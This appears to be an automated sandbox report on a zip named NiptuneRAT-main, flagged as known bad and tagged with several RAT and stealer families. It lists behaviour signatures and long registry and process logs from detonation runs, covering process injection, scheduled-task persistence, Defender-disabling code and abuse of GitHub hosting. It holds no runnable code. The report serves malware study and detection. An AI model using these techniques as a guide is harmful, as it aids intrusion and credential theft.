Malware Analysis Report

2024-10-10 10:38

Sample ID 240317-1jw4hsgg43
Target NiptuneRAT-main.zip
SHA256 5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b
Tags
identifier agilenet rat arrowrat agenttesla umbral asyncrat xworm default keylogger spyware stealer trojan ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5b054b368eda8d148383e6a64d890b885d9a0b1898493e1008ffe1a531118b6b

Threat Level: Known bad

The file NiptuneRAT-main.zip was found to be: Known bad.

Malicious Activity Summary

identifier agilenet rat arrowrat agenttesla umbral asyncrat xworm default keylogger spyware stealer trojan ransomware

Arrowrat family

Detect Umbral payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Async RAT payload

Detect Xworm Payload

Umbral family

AgentTesla

AgentTesla payload

Agenttesla family

Asyncrat family

Contains code to disable Windows Defender

AsyncRat

Xworm

Grants admin privileges

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Delays execution with timeout.exe

Enumerates system info in registry

Modifies data under HKEY_USERS

Gathers system information

Suspicious use of SendNotifyMessage

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs net.exe

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Gathers network information

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-17 21:41

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Arrowrat family

arrowrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral family

umbral

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win7-20240221-en

Max time kernel

359s

Max time network

364s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win10-20240221-en

Max time kernel

314s

Max time network

394s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.1.0.0.0.8.1.0.0.0.2.0.0.8.4.0.0.0.2.0.0.8.2.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win10v2004-20240226-en

Max time kernel

207s

Max time network

518s

Command Line

winlogon.exe

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4936 created 620 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4936 set thread context of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 = 7e003100000000007158b6ad11004465736b746f7000680009000400efbe5a58c8707158b7ad2e0000007ce101000000010000000000000000003e00000000007d0937004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 68003100000000007158bcad10004e495054554e7e310000500009000400efbe7158b6ad7158bdad2e00000066690100000005000000000000000000000000000000adaf97004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
